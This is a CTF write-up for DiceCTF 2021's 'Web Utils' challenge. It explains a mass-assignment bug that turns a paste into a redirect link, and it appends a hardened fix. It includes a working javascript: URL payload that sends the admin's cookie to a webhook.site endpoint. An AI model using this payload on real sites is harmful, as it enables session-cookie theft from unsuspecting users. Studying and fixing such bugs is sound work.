# Web Utils

- CTF: DiceCTF 2021
- Category: Web

## Instructions

My friend made [this dumb tool](https://web-utils.dicec.tf/); can you try and steal his cookies? If you send me a link, [I can pass it along](https://us-east1-dicegang.cloudfunctions.net/ctf-2021-admin-bot?challenge=web-utils).

The source code is provided in the [zip file](app.zip).

This app offers two features:
- Link shortener
- Pastebin

The relevant code is the paste-creation handler and the view page:

```js
// Create a "paste"
fastify.post('createPaste', {
  handler: (req, rep) => {
    const uid = database.generateUid(8);
    database.addData({ type: 'paste', ...req.body, uid });
    rep
      .code(200)
      .header('Content-Type', 'application/json; charset=utf-8')
      .send({
        statusCode: 200,
        data: uid
      });
  },
  schema: {
    body: {
      type: 'object',
      required: ['data'],
      properties: {
        data: { type: 'string' }
      }
    }
  }
});
```

```html
<html>
<head>
  <script async>
    (async () => {
      const id = window.location.pathname.split('/')[2];
      if (!id) window.location = window.origin;
      const res = await fetch(`${window.origin}/api/data/${id}`);
      const { data, type } = await res.json();
      if (!data || !type) window.location = window.origin;
      if (type === 'link') return window.location = data;
      if (document.readyState !== "complete")
        await new Promise((r) => { window.addEventListener('load', r); });
      document.title = 'Paste';
      document.querySelector('div').textContent = data;
    })()
  </script>
</head>
<body>
  <div style="font-family: monospace"></div>
</body>
</html>
```

## Analysis

The API endpoint lets us override the type of the record (`paste` or `link`) because the handler spreads `req.body` *after* setting the default type, so a client-supplied `type` key wins:

```js
database.addData({ type: 'paste', ...req.body, uid });
```

So we can create a `link` by sending a body such as:

`{"data":"My paste data goes here","type":"link"}`

We can now store text that is not a URL in the database as a link, which means the view page will run the following code on it:

```js
if (type === 'link') return window.location = data;
```

Since `window.location` accepts `javascript:` URLs, the following payload steals the admin's cookie:

```js
javascript:document.location='https://webhook.site/768da366-9c5e-4d86-9140-8afb55ccbd1b?c='+document.cookie
```

We first need to store the above payload as a link via the API:

![Create the link via api](create-link.png)

Once this is created, we can submit the following URL to the admin:

https://web-utils.dicec.tf/view/vXK4PSDY

When the admin visits that link, the browser is redirected to our endpoint with the cookie as a query parameter.

![Flag](flag.png)
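For the fix side, here is an added example (not the challenge's own code) showing the mass-assignment bug beside a hardened record builder and a redirect check for the view page; the function names and the sample request body are assumed.

```javascript
// Added example, not the challenge source: the createPaste mass-assignment
// bug next to a hardened version, plus a redirect check for the view page.
// Function names and the sample body below are assumed/constructed.

// Vulnerable: spreading req.body AFTER `type: 'paste'` means a client-supplied
// `type` key overwrites the server's default, turning a "paste" into a "link".
function buildRecordVulnerable(body, uid) {
  return { type: 'paste', ...body, uid };
}

// Hardened: copy only the field the schema allows and set `type` server-side;
// every other client-supplied key is dropped. (The Fastify body schema can
// additionally carry `additionalProperties: false` to reject extra keys.)
function buildRecordHardened(body, uid) {
  if (typeof body.data !== 'string') {
    throw new TypeError('data must be a string');
  }
  return { type: 'paste', data: body.data, uid };
}

// Defence in depth for the view page: only follow absolute http(s) URLs, so a
// `link` record can never send the browser to a javascript: or data: URL.
function isSafeRedirect(target) {
  let url;
  try {
    url = new URL(target);
  } catch (e) {
    return false; // not parseable as an absolute URL
  }
  return url.protocol === 'http:' || url.protocol === 'https:';
}

// Constructed request body of the kind described in the analysis above.
const maliciousBody = { data: 'javascript:alert(1)', type: 'link' };

console.log(buildRecordVulnerable(maliciousBody, 'AAAAAAAA').type); // link
console.log(buildRecordHardened(maliciousBody, 'AAAAAAAA').type);   // paste
console.log(isSafeRedirect(maliciousBody.data));                    // false
console.log(isSafeRedirect('https://example.com/view/abc'));        // true
```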

Original writeup: [https://github.com/0x00000dab/2021-DiceCTF/tree/master/web-web-utils](https://github.com/0x00000dab/2021-DiceCTF/tree/master/web-web-utils)